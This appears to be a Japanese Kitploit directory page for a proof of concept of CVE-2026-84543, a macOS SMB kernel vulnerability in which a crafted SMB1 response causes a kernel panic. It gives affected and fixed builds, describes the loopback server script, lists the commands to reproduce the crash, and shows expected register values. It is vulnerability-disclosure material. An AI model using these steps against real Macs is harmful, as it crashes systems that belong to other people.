Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-84543 — CVE-2026-84543の概念実証および技術的開示。細工されたSMB1応答によってカーネルパニックを引き起こすmacOS SMBカーネル脆弱性。 | Kitploit
ツール/GitHubGitHub/petermalone/cve-2026-84543
脆弱性分析エクスプロイト論文と研究バイナリエクスプロイト
GitHubpetermalone/cve-2026-84543

CVE-2026-84543

CVE-2026-84543の概念実証および技術的開示。細工されたSMB1応答によってカーネルパニックを引き起こすmacOS SMBカーネル脆弱性。

リポジトリを見る
7218時間27分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概念実証

この概念実証は、影響を受ける Mac のカーネルパニックと再起動を引き起こすことが想定されています。

研究中に使用された影響を受けるテストビルドは、macOS Tahoe 26.4 (25E246) および macOS 26.5 beta 4 (25F5068a) でした。Apple は CVE-2026-84543 を macOS Golden Gate 27、Tahoe 26.7、および Sequoia 15.8 で修正しました。

含まれる PoC

smb1_unix_whoami_poc.py はループバック証拠キャプチャサーバーです。Python の標準ライブラリのみを使用し、以下を行います:

  • Apple silicon 上で現在のブートの _COMM_PAGE_ASB_TARGET_KERN_VALUE を読み取る;
  • ループバック上でゲスト SMB1 共有を提供する;
  • 一貫性のないカウント/ポインタ状態を作り出すために細工された SMB_QFS_POSIX_WHOAMI (0x0202) レスポンスを返す;そして
  • パニックレジスタの来歴のために識別可能なカナリア値を含む UNIX_INFO2 (0x020B) 属性を返す。

再現手順

ターミナル A で:

root@kitploit:~
cd poc
sudo python3 smb1_unix_whoami_poc.py \
  --bind 127.0.0.1 \
  --port 445 \
  --log /tmp/CVE-2026-84543-poc.log

出力された ASB_TARGET_KERN_VALUE を記録してください;これはブート時にランダム化されます。

ターミナル B で:

root@kitploit:~
mkdir -p ~/mnt/cve-2026-84543
mount_smbfs //[email protected]/share ~/mnt/cve-2026-84543

予想されるレジスタの関係

T をブート時に出力されたカーネル値カナリアとすると:

root@kitploit:~
x8  = T
x9  = T
x10 = T & 0x1ff
x11 = T
x12 = T & 0x7fffffff
x13 = 0
x14 = (T & 0x7fffffff) - 1

x8、x9、および x11 の特定のビットが来歴を確立します。観測された関係は、サーバーのレスポンスフィールドとライブカーネルレジスタ状態との間のバイト単位のリンクを提供します。

ツールをダウンロード